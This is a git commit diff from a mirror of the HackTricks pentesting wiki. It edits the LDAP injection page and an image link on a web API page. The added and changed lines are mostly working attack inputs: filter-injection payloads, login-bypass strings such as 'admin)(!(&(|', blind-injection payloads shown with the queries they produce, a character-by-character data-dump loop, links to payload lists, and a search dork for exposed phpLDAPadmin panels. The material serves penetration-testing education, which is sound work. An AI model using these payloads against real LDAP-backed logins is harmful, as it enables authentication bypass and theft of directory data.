mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GitBook: [master] 2 pages and 4 assets modified
This commit is contained in:
parent
c2b98f8fb4
commit
a24d4e91d6
6 changed files with 32 additions and 15 deletions
Binary file not shown.
Before Width: | Height: | Size: 73 KiB After Width: | Height: | Size: 96 KiB |
BIN
.gitbook/assets/image (536).png
Normal file
BIN
.gitbook/assets/image (536).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 96 KiB |
BIN
.gitbook/assets/image (537).png
Normal file
BIN
.gitbook/assets/image (537).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 73 KiB |
BIN
.gitbook/assets/image (538).png
Normal file
BIN
.gitbook/assets/image (538).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 205 KiB |
|
@ -27,30 +27,28 @@
|
|||
**\(\|\)** = Absolute FALSE
|
||||
|
||||
For example:
|
||||
\(&\(!\(objectClass=Impresoras\)\)\(uid=s\*\)\)
|
||||
\(&\(objectClass=user\)\(uid=\*\)\)
|
||||
`(&(!(objectClass=Impresoras))(uid=s*))
|
||||
(&(objectClass=user)(uid=*))`
|
||||
|
||||
You can access to the database, and this can content information of a lot of different types.
|
||||
|
||||
The backups of LDAP uses the extension _ldif_
|
||||
|
||||
**OpenLDAP**: If 2 filters arrive, only executes the first one.
|
||||
**ADAM or Microsoft LDS**: With 2 filters they throw an error.
|
||||
**SunOne Directory Server 5.0**: Execute both filters.
|
||||
|
||||
**It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
|
||||
|
||||
The filter has to start with: _&_ or _\|_
|
||||
Example: _\(&\(directory=val1\)\(folder=public\)\)_
|
||||
The filter has to start with: `&` or `|`
|
||||
Example: `(&(directory=val1)(folder=public))`
|
||||
|
||||
\(&\(objectClass=VALUE1\)\(type=Epson\*\)\)
|
||||
VALUE1 = _\*\)\(ObjectClass=\*\)\)\(&\(objectClass=void_
|
||||
`(&(objectClass=VALUE1)(type=Epson*))
|
||||
VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
|
||||
|
||||
Then: _\(&\(objectClass=**\*\)\(ObjectClass=\*\)\)**_ will be the first filter \(the one executed\).
|
||||
Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter \(the one executed\).
|
||||
|
||||
## Login Bypass
|
||||
|
||||
LDAP supports several formats to store the password: clear, md5, smd5, sh1, ssha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
|
||||
LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
|
||||
|
||||
```bash
|
||||
user=*
|
||||
|
@ -92,7 +90,7 @@ password=pwd
|
|||
```bash
|
||||
username = admin)(!(&(|
|
||||
pass = any))
|
||||
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSO then the user is admin and the password check is True.
|
||||
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
|
||||
```
|
||||
|
||||
```bash
|
||||
|
@ -107,12 +105,29 @@ password=any
|
|||
--> (&(uid=admin)) (| (|) (webpassword=any))
|
||||
```
|
||||
|
||||
### Lists
|
||||
|
||||
[LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
|
||||
[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
|
||||
[LDAP\_authBypass](https://feelsec.info/wp-content/uploads/2018/11/LDAP_authBypass.txt)
|
||||
[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
|
||||
|
||||
## Blind LDAP Injection
|
||||
|
||||
You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
|
||||
|
||||
```bash
|
||||
#This will result on True, so some information will be shown
|
||||
Payload: *)(objectClass=*))(&objectClass=void
|
||||
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
|
||||
```
|
||||
|
||||
```bash
|
||||
#This will result on True, so no information will be returned or shown
|
||||
Payload: void)(objectClass=void))(&objectClass=void
|
||||
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
|
||||
```
|
||||
|
||||
### Dump data
|
||||
|
||||
You can iterate over the ascii letters, digits and symbols:
|
||||
|
||||
```bash
|
||||
|
@ -130,7 +145,7 @@ You can iterate over the ascii letters, digits and symbols:
|
|||
|
||||
### **Discover valid LDAP fields**
|
||||
|
||||
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
|
||||
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
|
||||
|
||||
```python
|
||||
#!/usr/bin/python3
|
||||
|
@ -189,5 +204,7 @@ for i in range(50):
|
|||
intitle:"phpLDAPadmin" inurl:cmd.php
|
||||
```
|
||||
|
||||
## More Payloads
|
||||
|
||||
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)
|
||||
|
||||
|
|
|
@ -25,7 +25,7 @@ These kind of APIs may be [**vulnerable to XXE**](../../pentesting-web/xxe-xee-x
|
|||
|
||||
You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\)
|
||||
|
||||
![](../../.gitbook/assets/image%20%28535%29.png)
|
||||
![](../../.gitbook/assets/image%20%28537%29.png)
|
||||
|
||||
### Check Access
|
||||
|
||||
|
|
Loading…
Reference in a new issue